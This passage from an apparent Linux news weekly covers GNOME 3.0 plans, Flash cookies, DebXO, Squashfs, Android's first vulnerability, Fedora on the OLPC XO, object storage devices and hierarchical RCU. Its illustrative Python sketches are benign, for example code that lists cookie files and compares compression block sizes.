is the notion of activities. An activity is essentially what Karl
Lattimer described as a project, made up of individual tasks, and what
many Gnome users organize into separate work spaces in the current
environment. In the current Gnome environment, Vincent argues,
activities and work spaces are static: a user configures 8 desktops
and sticks with them. His proposal is that activities should be far
more flexible, and if a user wants to start a new one then we should
help them by creating a new desktop automatically.

Where Next

Reportedly the release team are busy preparing a plan for how we can
move from Gnome 2.x to 3.0, with the current plan appearing to be that
what would have been called 2.30 will become 3.0. In this time frame,
the very least of what we can expect to see is a revamped Gtk+, but
what changes the user can expect to see is far harder to tell as there
are no known plans for a radical interface overhaul like that seen
during the development of KDE 4. Instead, it appears that the Gnome
release team are planning on sticking to their current principles with
regard to what features will become a core part of the desktop stack:
adoption by popular distributions, stability, and a proven track
record will all be required for features to make it in. This may seem
like it rules out huge amounts of innovation, but there are a number
of existing frameworks in Gnome that are very exciting (PolicyKit,
PackageKit, Clutter, GVFS, desktop search, D-Conf, online desktop),
and perhaps the 3.0 development cycle will see these mature and
finally deliver on their promise of revolutionizing the user
experience, with many of these technologies forming the backbone of
the ideas discussed in this article.

		Another kind of cookie


It has become increasingly difficult to use the web without some kind of
Flash player, but a little-known "feature" of Flash is causing some privacy
concerns.  In some ways, Local Shared
Objects (LSOs aka Flash cookies) are similar to browser cookies, but
there are a number of significant differences as well.
In addition, because the dominant Flash player is closed-source, one must
depend on Adobe's ability to faithfully implement the security model.  In
all, Flash cookies are something that web users should be cognizant of.


At its core, an LSO is a chunk of data that is stored on a user's disk
based on the domain that the Flash program was downloaded from.  Only Flash
programs from that domain should have access to the data and, unlike
browser cookies, much more data can be stored.  By default, 100K bytes can
be used per domain, which is a sizable increase from the 4K available for
browser cookies.  The amount of storage for a Flash cookie can be increased
with the assent of the user, or decreased via the management interface.


Another major difference from the now-familiar browser cookies is that the
interface for managing them is less-than-obvious.  From a given Flash
application, there is a "Settings" menu that allows control of the LSOs
from that site.  To see the sites that have stored Flash cookies or to have
more global control over them, one must visit Adobe's site.
There are also third-party applications and browser add-ons that will allow
more control. A user can also resort to the ultimate control—removing
them from the filesystem (~/.macromedia/Flash_Player/#SharedObjects). 
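
Before deleting anything, it can be instructive to see what is actually stored there.  The sketch below walks the directory named above and lists what it finds; it assumes that LSOs are stored as files with a .sol extension somewhere beneath that directory, and the function names are made up for illustration.

```python
import os
from pathlib import Path

# Location given in the text, relative to the user's home directory.
LSO_DIR = Path(os.path.expanduser("~/.macromedia/Flash_Player/#SharedObjects"))


def find_flash_cookies(root: Path = LSO_DIR) -> list[Path]:
    """Return every .sol file found under `root`, sorted for stable output."""
    if not root.is_dir():
        return []
    return sorted(p for p in root.rglob("*.sol") if p.is_file())


def total_size(cookies: list[Path]) -> int:
    """Combined size of the given files in bytes."""
    return sum(p.stat().st_size for p in cookies)
```

Printing the result of find_flash_cookies() shows which sites have left data behind; the paths it returns are the files a user would remove to clear them.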


There are many benign things that a Flash application might do with a bit
of local storage—caching data, storing preferences, etc.—but
they can also be used to track users in much the same way that browser
cookies are used.  Because Flash cookies are less well-known, and harder to
manage, though, they may be more effective because they are removed or
restricted less often.


Another important thing to note is that there is no requirement that there
be a visible Flash application on the web site.  A site could embed a Flash
application with no visible elements simply to store a cookie.  Unless the
user has a browser add-on like NoScript,
they will get no indication that anything has happened.


Assuming that there aren't any holes in Adobe's implementation of the Flash
security model, Flash cookies aren't much different—or more
dangerous—than browser cookies.  But that assumption is a bit
worrisome.  For Firefox or other free software browsers, the code can be
inspected to verify correct behavior.  Either Flash or Firefox could have
some flaw 
that allowed cross-site cookie access (which would be a rather nasty
information disclosure vulnerability), but for Flash, we can only take
Adobe's word.


Privacy advocates have been successful in getting the idea of deleting
browser cookies 
into the consciousness of concerned users, but Flash cookies seem to have
flown below the radar.  A recent blog
posting that was widely reported has helped to raise the profile of
Flash cookies so that users will, hopefully, know that they exist.  Those
with a desire to strictly control their privacy will be better able to do
so. With 
luck, it may also lead Adobe to provide an easier and more visible
interface to manage them 
as well. 


		DebXO for the XO laptop


The XO laptop was developed for the One Laptop Per Child (OLPC)
project.  Two weeks ago the XO Software
Release 8.2.0 was announced.  This week the DebXO project has taken
off, with the goal of providing a Debian-based alternative for the XO
laptop.  Work has been in progress for at least a couple of months, but
versions 0.2 and 0.3 were announced this week.

As of this writing, Andres "dilinger" Salomon has released three versions; the
debxo-latest symlink points to the latest release.  According to the version 0.2 announcement, DebXO has EXT3 images
for booting from USB and/or SD; and while DebXO 0.1 only had a GNOME
desktop, 0.2 includes KDE, LXDE, Sugar, Awesome and GNOME desktops.  Version 0.3 provides some important bug fixes
for problems found in 0.2.

This project is obviously still in its infancy, but it seems like a good
start on an alternative for the XO laptop.  If you have an XO and are
interested in helping out you could start by testing the current versions.
There is a git repository with the code, which has a web
interface, or just use git clone to grab the code.

		Squashfs submitted for the mainline


The Squashfs compressed
filesystem is 
used in everything from Live CDs to embedded devices.  Many or most
distributions ship it in such situations, but squashfs has been
maintained outside of the mainline kernel for years.  That appears to be changing as
it was recently submitted for inclusion in the mainline by Phillip Lougher.  The reaction has
been generally favorable, with Andrew Morton requesting that Lougher move it forward:
"Please prepare a tree for linux-next 
inclusion and unless serious problems are pointed out I'd suggest
shooting for a 2.6.29 merge."
  So it seems like a good time to take a look at some of the
features and capabilities of Squashfs.


The basic idea behind Squashfs is to generate a compressed image of a
filesystem or directory hierarchy that can be mounted as a read-only
filesystem.  This can be done to archive a set of directories or to store
them on a smaller capacity device than would normally be required.  The
latter is used by both Live CDs and embedded devices to squeeze more into
less. 


It has been nearly four years since Squashfs was last submitted to linux-kernel.
Since that time, it has been almost completely rewritten based on
comments from that attempt.  In addition, it has gone through two filesystem
layout revisions in part to allow for 64-bit sizes for files and
filesystems.  Another major change is to make the filesystem little-endian,
so that it can be read on any architecture, regardless of endian-ness.


The mksquashfs utility is used to create the image, which can then
be mounted either via loopback (from a file) or from a regular block device.
One of the features added since the original attempt to mainline
Squashfs—to address complaints made at that time—is the ability
to export a Squashfs filesystem via NFS. 


Squashfs uses gzip compression on filesystem data and metadata, achieving
sizes roughly one-third that of an ext3 filesystem with the same data.  The
performance
is quite good as well, even when compared with the simpler cramfs—a
compressed read-only filesystem already available with the kernel.
According to Lougher, these performance numbers were gathered a number of
years ago, with older versions of the code; newer numbers should be even
better.


Previously, some kernel developers were resistant to adding another
compressed filesystem to the kernel, so Lougher outlines a number of
reasons that Squashfs is superior to cramfs.  Certainly support for larger
files and filesystems is compelling, but the fact that cramfs is orphaned
and unmaintained will likely also play a role.  In addition, Squashfs
supports many more "normal" Linux filesystem features like real inode
numbers, hard links, and exportability.


Morton had a laundry list of overall suggestions for making Squashfs better
in the email referenced above, but documentation is certainly one of the
areas that is somewhat lacking.  In particular, Squashfs maintains its own
cache, which puzzles Morton:

Why not just decompress these blocks into pagecache
  and let the VFS handle the caching??

  The real bug here is that this rather obvious question wasn't
  answered anywhere in the patch submission (afaict). How to fix that?

  Methinks we need a squashfs.txt which covers these things.


One of the reasons that Squashfs doesn't use the page cache is that it
allows for multiple block sizes, from 4K up to 1M, with a default of 128K.
Better compression ratios can be achieved with a larger block size, but that
doesn't work well with the page cache as Jörn Engel 
notes: "One of the problems seems to
be that your blocksize 
can exceed page size and there really isn't any infrastructure to deal
with such cases yet."
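The block-size tradeoff can be illustrated with a small userspace experiment.  The following is only a sketch: it uses Python's zlib module as a stand-in for the kernel's gzip support, it makes no attempt to reproduce the Squashfs on-disk format, and the helper names (compressed_size(), make_sample()) are invented for the example.  The sample data repeats every 8K, so a 4K block never sees the repetition while a 128K block does.

```python
import random
import zlib


def compressed_size(data: bytes, block_size: int) -> int:
    """Total size when every block is compressed independently with zlib."""
    total = 0
    for start in range(0, len(data), block_size):
        total += len(zlib.compress(data[start:start + block_size]))
    return total


def make_sample(total_size: int = 1 << 20, period: int = 8192) -> bytes:
    """Deterministic sample data whose redundancy repeats every `period` bytes."""
    rng = random.Random(0)
    chunk = bytes(rng.getrandbits(8) for _ in range(period))
    return chunk * (total_size // period)


sample = make_sample()
# Compare the smallest Squashfs block size (4K) with the default (128K).
sizes = {bs: compressed_size(sample, bs) for bs in (4096, 131072)}
for block_size, size in sizes.items():
    print(f"{block_size:>7}-byte blocks: {size} bytes compressed")
```

Real filesystem contents will not be this regular, so the gap seen here should not be read as a prediction of Squashfs compression ratios.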


Lougher has moved the code into a git
repository, presumably in preparation to get it into linux-next.  He
notes that the CE Linux Forum has
been instrumental in providing funding over the last four months to allow
him to work on getting Squashfs into the mainline.  With the additional
testing that will come from being included in linux-next, it seems quite
possible we could see Squashfs in 2.6.29.


		Android's first vulnerability


A company's response to security vulnerabilities is always interesting to
watch.  Google has the reputation of being fairly cavalier regarding flaws
reported in its code; 
the first security vulnerability reported
for the Android mobile phone software appears to follow that pattern.
Unfortunately for users of Android phones, though, Google's attitude and
relatively slow response might some day lead to an "in the wild" exploit
targeting the phones. 


The flaw was first reported to Google on October 20 by Independent Security
Evaluators (ISE), but was not patched for the G1 phone—the only
shipping Android phone—until November 3.  Details on the
vulnerability are thin, but it affects the web browser and is caused by
Google shipping an out-of-date component.  Presumably a library or content
handler was shipped with a known security flaw that could lead to code
execution as the user id which runs the browser.


It should be noted that compromising the browser does not affect the rest
of the phone due to Android's security architecture.  Unlike the iPhone,
separate applications are run as different users, so that phone
functionality is isolated from the browser, instant messaging, and other
tools.  An iPhone compromise in any application can lead to the attacker
being able to make phone calls and get access to private data associated
with any application; clearly Google made a better choice than Apple.


One interesting recent development, though, is the availability of an
application that provides a root-owned
telnet daemon.  With that running, a simple telnet gets full access to
the phone's filesystem.  From there, jailbreaking—circumventing the
restrictions placed by a carrier on applications—as well as unlocking
the phone from a specific carrier are possible.  While it is easy to see
how that might be useful for the owner of an Android phone (even though it
opens the phone to rather intrusive attacks), it probably is not what
T-Mobile (and other carriers down the road) had in mind.


Google's first
response to the vulnerability report was to whine that Charlie
Miller, who discovered the flaw, was not being "responsible" by talking
about it before a fix was ready.  Miller did not disclose details, but did
report the existence of—along with some general information
about—the flaw.  Google's previous reputation regarding vulnerability
reporting, as well as how it treated Miller, undoubtedly played a role in
his decision.


Perhaps the most galling thing is that the flaw was in a free software
component that had been updated prior to the Android release to, at least
in part, close that hole.  It would seem that the Android team was not
paying attention to security flaws reported in the free software components
that make up the phone software stack.  Hopefully, this particular
occurrence will serve as a wake-up call on that front.


Given that the fix was already known, it is a bit puzzling that it
would take two weeks for updates to become available.  It was the first
update made for Android phones in the field, but one hopes the bugs in that
process were worked out long ago.  Overall, Google's response leaves rather
a lot to be desired.


If Google wants security researchers to be more "responsible" in their
disclosure, it would be well served by looking at its own behavior.  Taking
too much time to patch a vulnerability—especially one with a known
and presumably already tested fix—is not the way to show the security
community that it takes such bugs seriously.  Whining about disclosure
rarely, if ever, goes anywhere; working in a partnership with folks who
find security flaws is much more likely to bear fruit.


		Testing Fedora on the OLPC


In preparation for this year's version of the Give One, Get One (G1G1) 
promotion of the One Laptop Per Child (OLPC) XO, the
Fedora OLPC special interest
group (SIG) has
undertaken a rather large testing effort.  With the assistance of 80
mostly-free XOs, the group has been running Fedora 10 on the hardware,
trying to shake out Fedora and OLPC bugs.  The idea is to help lift
some of the burden from the OLPC developers, while also providing some
distribution testing focused on areas specific to the OLPC hardware.


G1G1 participants can optionally purchase an SD card pre-loaded with
a Fedora 10 live distribution, so that they can run a full Fedora desktop on
the XO.  Normally, the laptop runs a stripped-down version of Fedora 9 with the Sugar interface as the only
desktop available.  Part of the Fedora OLPC effort is to help reduce the
operating system burden for the OLPC folks.  Fedora OLPC liaison (and Red
Hat Senior Community Architect) Greg DeKoenigsberg describes where the
project is headed:

The Fedora community is working 
closely with OLPC to incorporate their changes upstream, and we are also 
working to package Sugar as a standard desktop environment for Fedora. 
Our hope is that, in future releases, the XO can run a completely stock 
version of Fedora — that way, OLPC will not have to bear any costs of 
maintaining the distro itself, and can focus their resources where they 
are most effective: the hardware, and Sugar.


Back in September, DeKoenigsberg put out a call for folks interested
in testing, with the incentive of a "mostly" free XO.  Participants
needed to be willing to buy an SD card to put Fedora on and to spend 20
hours testing Fedora on the XO.  There were more volunteers than laptops,
as would be expected, but 80 XOs—most refurbished returns from the
original G1G1 last year—got into the hands of many "experienced
Fedora community members."  The XOs were provided by the OLPC
project through its developer
program. 


The testing has already "found and resolved a number of potential
release blockers," according to DeKoenigsberg.  There is an
extensive test
plan that outlines the different testing areas as well as the
methodology of testing and reporting bugs found.  In many ways, this is
just a test of Fedora on a new hardware platform, with the focus on things
that set the XO apart: power management, networking, the built-in camera,
display, performance, etc.


But there is more to the SIG than just testing the XO.  The task list has a number
of different activities that are currently underway.  Getting a developer
key to each person who chooses the Fedora 10 option in G1G1 is an important
piece of the puzzle, since the XO security policy will not allow the laptop
to boot from SD without one.  Various Sugar tasks are high on the list as well.


One of those is
the Fedora
Sugar spin, a Live CD that allows running the Sugar environment on
any computer.  So far, there are just a few Sugar "activities"—roughly
equivalent to applications for things like
web browsing or word processing—available for the spin, but that is
another of the 
tasks that Fedora OLPC will be working on.  There is currently a bit of
an awkward debate on the fedora-advisory-board
mailing list about how 
"official" the Sugar spin really is—as it missed the deadline for the
Fedora 
10 freeze—but it would seem that many are in favor of granting it a
waiver.  


The Fedora OLPC SIG's mission statement—To provide the OLPC
project with a strong, sustainable, scalable, community-driven base
platform for innovation—makes it clear it sees a big role in
assisting OLPC going forward.  The testing effort is just one facet of that,
as DeKoenigsberg notes: 

We hope to have success with the Fedora on XO testing project, but the 
real goal is longer term and more strategic.  OLPC has placed a very large 
bet on open source software.  In order to be successful, they need 
knowledgeable contributors — which Fedora has in abundance.  There may be 
more than a million XOs in the wild by the end of this year, and all of 
them will be running a remix of Fedora by default.  In Fedora, we have a 
responsibility to help make OLPC successful, and the Fedora community 
takes that responsibility very seriously.


The OLPC project is one with great promise.  It has suffered at times from
the mixed message that it gives regarding free vs. proprietary software,
but it could, clearly, be a marvelous example of free software in
action.  In order for that to happen, though, there will need to be a
concerted effort by the free software community to assist.  The Fedora OLPC
SIG looks to be an excellent step in that direction.


		Linux and object storage devices


The btrfs filesystem is widely regarded as being the long-term future
choice for Linux.  But what if btrfs is taking the wrong direction,
fighting an old war?  If the nature of our storage devices changes
significantly, our filesystems will have to change as well.  A lot of
attention has been paid to the increasing prevalence of flash-based
devices, but there is another upcoming technology which should be planned
for: object storage devices (OSDs).  The recent posting of a new
filesystem called osdfs
provides a good opportunity to look at OSDs and how they might be supported
under Linux.


The developers of OSDs were driven by the idea that traditional,
block-based disk drives offer an overly low-level interface.  With
contemporary hardware, it should be possible to push more intelligence into
storage devices, offloading work from the host while maintaining (or
improving) performance and security.  So the interface offered by an OSD
does not deal in blocks; instead, the OSD provides "objects" to the host
system.  Most objects will simply be files, but a few other types of
objects (partitions, for example) are supported as well.  The host
manipulates these objects, but need not (and cannot) concern itself with
how those objects are implemented within the device.


A file object is identified by two 64-bit numbers.  It contains whatever
data the creator chooses to put in there; an OSD does not interpret the
data in any way.  Files also have a collection of attributes and metadata;
this includes much of the information stored in an on-disk inode in a
traditional filesystem - but without the block layout information, which
the OSD hides from the rest of the world.  All of the usual operations can
be performed on files - reading, writing, appending, truncating, etc. -
but, again, the implementation of those operations is handled by the OSD.


One thing that is not handled by the OSD, though, is the creation of
a directory hierarchy or the naming of files.  It is expected that the host
filesystem will use file objects to store its directory structure,
providing a suitable interface to the filesystem's users.  One could,
presumably, also use an OSD as a sort of hardware-implemented object
database without a whole lot of high-level code, but that is not where the
focus of work with OSDs is now.



The OSD protocol
[PDF] is a T10-sanctioned extension to the SCSI protocol.  It is thus
expected that OSD devices will be directly attached to host systems; the
protocol has been designed to perform well in that mode.  It is also
expected, though, that OSDs will be used in network-attached storage
environments.  For such deployments, the OSD designers decided to offload
another task from the host systems: security.
To that end, the OSD protocol includes an extensive set of security-related
commands.  Every operation on an object must be accompanied by a "capability," a
cryptographically-signed ticket which names the object and the access
rights possessed by the owner of the capability.  In the absence of a
suitable capability, the drive will deny access.

It is expected that capabilities will be handed out by a security policy
daemon running somewhere on the network.  That daemon may be in possession
of the drive's root key, which allows unrestricted access to the drive, or
it may have a separate, partition-level key instead.  Either way, it can
use that key to sign capabilities given out to processes elsewhere in the
system.  (Drives also have a "master" key, used primarily to change the
root key.  Loss of the master key is probably a restore-from-backup sort of
event.)

Capabilities last for a while (they include an expiration time) and
describe all of the allowed operations.  So the act of actually obtaining a
capability should be relatively rare; most OSD operations will be performed
using a capability which the system already has in hand.  That is an
important design feature; adding "ask a daemon for a capability" to the
filesystem I/O path would not be a performance-enhancing move.
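The capability scheme can be sketched in a few lines.  What follows is an illustration under loudly stated assumptions, not the T10 wire format: the field layout, the rights bits, the use of HMAC-SHA256, and the function names are all invented here.  It shows only the general shape of the idea: a policy daemon signs a ticket naming an object, its access rights, and an expiration time, and the drive checks that ticket without consulting anybody else.

```python
import hashlib
import hmac
import struct

# Hypothetical rights bits; the real protocol defines its own permission set.
READ, WRITE = 0x1, 0x2

# Assumed layout: partition ID, object ID, rights, expiration time.
_BODY = struct.Struct(">QQIQ")
_TAG_LEN = hashlib.sha256().digest_size


def make_capability(key: bytes, partition_id: int, object_id: int,
                    rights: int, expires: int) -> bytes:
    """Policy-daemon side: sign a ticket naming the object and its rights."""
    body = _BODY.pack(partition_id, object_id, rights, expires)
    return body + hmac.new(key, body, hashlib.sha256).digest()


def check_capability(key: bytes, cap: bytes, partition_id: int,
                     object_id: int, wanted: int, now: int) -> bool:
    """Drive side: deny access unless the ticket is valid for this request."""
    if len(cap) != _BODY.size + _TAG_LEN:
        return False
    body, tag = cap[:_BODY.size], cap[_BODY.size:]
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return False                      # forged or tampered ticket
    cap_partition, cap_object, rights, expires = _BODY.unpack(body)
    if (cap_partition, cap_object) != (partition_id, object_id):
        return False                      # ticket names a different object
    if now >= expires:
        return False                      # ticket has expired
    return (rights & wanted) == wanted


partition_key = b"example partition-level key"
cap = make_capability(partition_key, 1, 0x10000, READ, expires=1000)
print(check_capability(partition_key, cap, 1, 0x10000, READ, now=500))
```

Because the check needs only the key and the ticket itself, a host can reuse one capability for many operations until it expires, which is the property the design relies on to keep the daemon out of the I/O path.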

In theory, it should be relatively easy to make a standard Linux filesystem
support an OSD.  It's mostly a matter of hacking out much of the low-level
block layout and inode management code, replacing it with the appropriate
object operations.  The osdfs filesystem was created in this way; the
developers started with ext2.  After taking out all the code they no longer
needed, the osdfs developers simply added code translating VFS-level
requests into operations understood by the OSD.  Those requests are then
executed by way of the low-level osd-initiator
code (which was also recently submitted for consideration).
Directories are implemented as simple files containing names and
associated object IDs.  There is no separate on-disk inode; all of that
information is stored as attributes to the file itself.  The end result is
that the osdfs code is relatively small; it is mostly concerned with
remapping VFS operations into OSD operations.
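The resulting division of labor can be sketched with a toy model.  Nothing below is taken from the osdfs source: ToyOSD and ToyFS are hypothetical names, the directory encoding (JSON) is chosen purely for convenience, and the "device" is a pair of Python dictionaries.  The point is only that the host side needs little more than name-to-object-ID mapping when the device handles storage and attributes.

```python
import json
from typing import Dict, Tuple

ObjectId = Tuple[int, int]  # (partition ID, object ID): two 64-bit numbers


class ToyOSD:
    """In-memory stand-in for an object storage device (hypothetical)."""

    def __init__(self) -> None:
        self.data: Dict[ObjectId, bytes] = {}
        self.attrs: Dict[ObjectId, dict] = {}
        self._next_id = 0x10000

    def create(self, partition: int, **attrs) -> ObjectId:
        oid = (partition, self._next_id)
        self._next_id += 1
        self.data[oid] = b""
        self.attrs[oid] = dict(attrs)   # inode-like metadata lives here
        return oid

    def write(self, oid: ObjectId, payload: bytes) -> None:
        self.data[oid] = payload

    def read(self, oid: ObjectId) -> bytes:
        return self.data[oid]


class ToyFS:
    """Host-side layer: directories are ordinary objects holding name -> ID."""

    def __init__(self, osd: ToyOSD, partition: int = 1) -> None:
        self.osd = osd
        self.partition = partition
        self.root = osd.create(partition, mode="dir")
        self._store_dir(self.root, {})

    def _load_dir(self, oid: ObjectId) -> dict:
        return json.loads(self.osd.read(oid).decode())

    def _store_dir(self, oid: ObjectId, entries: dict) -> None:
        self.osd.write(oid, json.dumps(entries).encode())

    def create(self, parent: ObjectId, name: str, mode: str) -> ObjectId:
        child = self.osd.create(self.partition, mode=mode)
        if mode == "dir":
            self._store_dir(child, {})
        entries = self._load_dir(parent)
        entries[name] = child[1]
        self._store_dir(parent, entries)
        return child

    def lookup(self, path: str) -> ObjectId:
        oid = self.root
        for name in filter(None, path.split("/")):
            oid = (self.partition, self._load_dir(oid)[name])
        return oid


fs = ToyFS(ToyOSD())
etc = fs.create(fs.root, "etc", "dir")
motd = fs.create(etc, "motd", "file")
fs.osd.write(motd, b"hello from an object\n")
print(fs.lookup("/etc/motd"), fs.osd.read(fs.lookup("/etc/motd")))
```

Note that there is no block allocation anywhere in the host-side class; that work has moved entirely behind the device interface.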


Anybody wanting to test this code may run into one small problem: there are
few OSDs to be found in the neighborhood computer store.  It would appear
that most of the development work so far has been done using OSD
simulators.  The OSC software
OSD is, like osdfs, part of the open-osd project; it implements the OSD
protocol over an SQLite database.  There is also an OSD simulator
hosted at IBM, but it would not appear to be under current development.
Simulator-based development and testing may not be as rewarding as having a
shiny new device implementing OSD in hardware, but it will help to ensure
that both the software and the protocol are in good shape by the time such
hardware is available.


It should be noted that the success of OSDs is not entirely assured.  An
OSD takes much of the work normally done in an operating system kernel and
shoves it into a hardware firmware blob where it cannot be inspected or
fixed.  A poor implementation will, at best, not perform well; at worst,
the chances of losing data could increase considerably.  It may yet prove
best to insist that storage devices just concentrate on placing bits where
the operating system tells them to and leave the higher-level decisions to
higher-level code.  Or it may turn out that OSDs are the next step forward
in smarter, more capable hardware.  Either way, it is an interesting
experiment. 


See this
article at Sun for more information on how OSD works.

		Hierarchical RCU


Introduction
Read-copy update (RCU) is a synchronization mechanism that was added to
the Linux kernel in October of 2002.
RCU improves scalability
by allowing readers to execute concurrently with writers.
In contrast, conventional locking primitives require that readers
wait for ongoing writers and vice versa.
RCU ensures coherence for read accesses by
maintaining multiple versions of data structures and ensuring that they are not
freed until all pre-existing read-side critical sections complete.
RCU relies on efficient and scalable mechanisms for publishing
and reading new versions of an object, and also for deferring the collection
of old versions.
These mechanisms distribute the work among read and
update paths in such a way as to make read paths extremely fast. In some
cases (non-preemptable kernels), RCU's read-side primitives have zero
overhead.

Although Classic RCU's read-side primitives enjoy excellent
performance and scalability, the update-side primitives, which
determine when pre-existing read-side critical sections have
finished, were designed with only a few tens of CPUs in mind.
Their scalability is limited by a global lock that must be
acquired by each CPU at least once during each grace period.
Although Classic RCU actually scales to a couple of hundred CPUs, and
can be tweaked to scale to roughly a thousand CPUs (but at the expense of
extending grace periods), emerging multicore systems will require
it to scale better.

In addition, Classic RCU has a sub-optimal dynticks interface,
with the result that Classic RCU will wake up every CPU at least
once per grace period.
To see the problem with this, consider a 16-CPU system that
is sufficiently lightly loaded that it is keeping only four
CPUs busy.
In a perfect world, the remaining twelve CPUs could be put into
deep sleep mode in order to conserve energy.
Unfortunately, if the four busy CPUs are frequently performing
RCU updates, those twelve idle CPUs will be awakened frequently,
wasting significant energy.
Thus, any major change to Classic RCU should also leave sleeping CPUs lie.

Both the existing and the
proposed implementation
have Classic RCU semantics and identical APIs; however,
the old implementation will be called “classic RCU”
and the new implementation will be called “tree RCU”.


	Review of RCU Fundamentals
	Brief Overview of Classic RCU Implementation
	RCU Desiderata
	Towards a More Scalable RCU Implementation
	Towards a Greener RCU Implementation
	State Machine
	Use Cases
	Testing

These sections are followed by
concluding remarks and the
answers to the Quick Quizzes.


Review of RCU Fundamentals
In its most basic form, RCU is a way of waiting for things to finish.
Of course, there are a great many other ways of waiting for things to
finish, including reference counts, reader-writer locks, events, and so on.
The great advantage of RCU is that it can wait for each of
(say) 20,000 different things without having to explicitly
track each and every one of them, and without having to worry about
the performance degradation, scalability limitations, complex deadlock
scenarios, and memory-leak hazards that are inherent in schemes
using explicit tracking.

In RCU's case, the things waited on are called
"RCU read-side critical sections".
An RCU read-side critical section starts with an
rcu_read_lock() primitive, and ends with a corresponding
rcu_read_unlock() primitive.
RCU read-side critical sections can be nested, and may contain pretty
much any code, as long as that code does not explicitly block or sleep
(although a special form of RCU called
"SRCU"
does permit general sleeping in SRCU read-side critical sections).
If you abide by these conventions, you can use RCU to wait for any
desired piece of code to complete.

RCU accomplishes this feat by indirectly determining when these
other things have finished, as has been described elsewhere for
Classic RCU and realtime RCU.

In particular, as shown in the following figure, RCU is a way of
waiting for pre-existing RCU read-side critical sections to completely
finish, including memory operations executed by those critical sections.


However, note that RCU read-side critical sections
that begin after the beginning
of a given grace period can and will extend beyond the end of that grace
period.

The following section gives a very high-level view of how
the Classic RCU implementation operates.


Brief Overview of Classic RCU Implementation

The key concept behind the Classic RCU implementation is that
Classic RCU read-side critical sections are confined to kernel
code and are not permitted to block.
This means that any time a given CPU is seen
either blocking, in the idle loop, or exiting the kernel, we know that all
RCU read-side critical sections that were previously running on
that CPU must have completed.
Such states are called “quiescent states”, and
after each CPU has passed through at least one quiescent state,
the RCU grace period ends.


Classic RCU's most important data structure is the rcu_ctrlblk
structure, whose ->cpumask field contains
one bit per CPU.
Each CPU's bit is set to one at the beginning of each grace period,
and each CPU must clear its bit after it passes through a quiescent
state.
Because multiple CPUs might want to clear their bits concurrently,
which would corrupt the ->cpumask field, a
->lock
spinlock is used to protect ->cpumask, preventing any
such corruption.
Unfortunately, this spinlock can also suffer extreme contention if there
are more than a few hundred CPUs, which might soon become quite common
if multicore trends continue.
Worse yet, the fact that all CPUs must clear their own bit means
that CPUs are not permitted to sleep through a grace period, which limits
Linux's ability to conserve power.
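The bottleneck is easy to see in a userspace simulation.  This is a sketch only, not kernel code: threads stand in for CPUs, a Python lock stands in for the spinlock, and the class, its `completed` field, and its `lock_acquisitions` counter are illustrative inventions.  Every simulated CPU must take the one global lock to clear its bit, so the number of acquisitions per grace period grows linearly with the number of CPUs.

```python
import threading


class ClassicRcuCtrlBlk:
    """Toy model of a single global control block with one bit per CPU."""

    def __init__(self, nr_cpus: int) -> None:
        self.nr_cpus = nr_cpus
        self.lock = threading.Lock()      # the single global lock
        self.cpumask = 0
        self.completed = 0                # grace periods finished so far
        self.lock_acquisitions = 0        # bookkeeping for the example only

    def start_grace_period(self) -> None:
        with self.lock:
            self.cpumask = (1 << self.nr_cpus) - 1   # one bit set per CPU

    def note_quiescent_state(self, cpu: int) -> bool:
        """Clear this CPU's bit; return True if that ended the grace period."""
        with self.lock:
            self.lock_acquisitions += 1
            bit = 1 << cpu
            if not self.cpumask & bit:
                return False              # already reported
            self.cpumask &= ~bit
            if self.cpumask == 0:
                self.completed += 1
                return True
            return False


def run_one_grace_period(nr_cpus: int) -> ClassicRcuCtrlBlk:
    ctrl = ClassicRcuCtrlBlk(nr_cpus)
    ctrl.start_grace_period()
    cpus = [threading.Thread(target=ctrl.note_quiescent_state, args=(cpu,))
            for cpu in range(nr_cpus)]
    for t in cpus:
        t.start()
    for t in cpus:
        t.join()
    return ctrl


ctrl = run_one_grace_period(16)
print(ctrl.completed, ctrl.lock_acquisitions)
```

The simulation also shows why no CPU can sleep through a grace period in this scheme: the mask reaches zero only when every CPU has shown up to clear its own bit.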


The next section lays out what we need from a new non-real-time
RCU implementation.

RCU Desiderata

The list of RCU desiderata called out at LCA2005 for
real-time RCU is a very good start:


	Deferred destruction, so that an RCU grace period cannot end
	until all pre-existing RCU read-side critical sections have
	completed.
	Reliable, so that RCU supports 24x7 operation for years at
	a time.
	Callable from irq handlers.
	Contained memory footprint, so that mechanisms exist to expedite
	grace periods if there are too many callbacks.  (This is weakened
	from the LCA2005 list.)
	Independent of memory blocks, so that RCU can work with any
	conceivable memory allocator.
	Synchronization-free read side, so that only normal non-atomic
	instructions operating on CPU- or task-local memory are permitted.
	(This is strengthened from the LCA2005 list.)
	Unconditional read-to-write upgrade, which is used in several
	places in the Linux kernel where the update-side lock is
	acquired within the RCU read-side critical section.
	Compatible API.

Because this is not to be a real-time RCU, the requirement for
preemptable RCU read-side critical sections can be dropped.
However, we need to add a few more requirements to account for changes
over the past few years:


	Scalability with extremely low internal-to-RCU lock contention.
	RCU must support at least 1,024 CPUs gracefully, and preferably
	at least 4,096.
	Energy conservation: RCU must be able to avoid awakening
	low-power-state dynticks-idle CPUs, but still determine
	when the current grace period ends.
	This has been implemented in real-time RCU, but needs serious
	simplification.
	RCU read-side critical sections must be permitted in NMI
	handlers as well as irq handlers.  Note that preemptable RCU
	was able to avoid this requirement due to a separately
	implemented synchronize_sched().
	RCU must operate gracefully in face of repeated CPU-hotplug
	operations.
	This is simply carrying forward a requirement met by both
	classic and real-time RCU.
	It must be possible to wait for all previously registered
	RCU callbacks to complete, though this is already provided
	in the form of rcu_barrier().
	Detecting CPUs that are failing to respond is desirable,
	to assist diagnosis both of RCU and of various infinite
	loop bugs and hardware failures that can prevent RCU grace
	periods from ending.
	Extreme expediting of RCU grace periods is desirable,
	so that an RCU grace period can be forced to complete within
	a few hundred microseconds of the last relevant RCU read-side
	critical section completing.
	However, such an operation would be expected to incur
	severe CPU overhead, and would be primarily useful when
	carrying out a long sequence of operations that each needed
	to wait for an RCU grace period.

The most pressing of the new requirements is the first one, scalability.
The next section therefore describes how to make order-of-magnitude reductions
in contention on RCU's internal locks.


Towards a More Scalable RCU Implementation
One effective way to reduce lock contention is to create a hierarchy,
as shown in the following figure.
Here, each of the four rcu_node structures has its own lock,
so that only CPUs 0 and 1 will acquire the lower left
rcu_node's lock, only CPUs 2 and 3 will acquire the
lower middle rcu_node's lock, and only CPUs 4 and 5
will acquire the lower right rcu_node's lock.
During any given grace period,
only one of the CPUs accessing each of the lower rcu_node
structures will access the upper rcu_node, namely, the
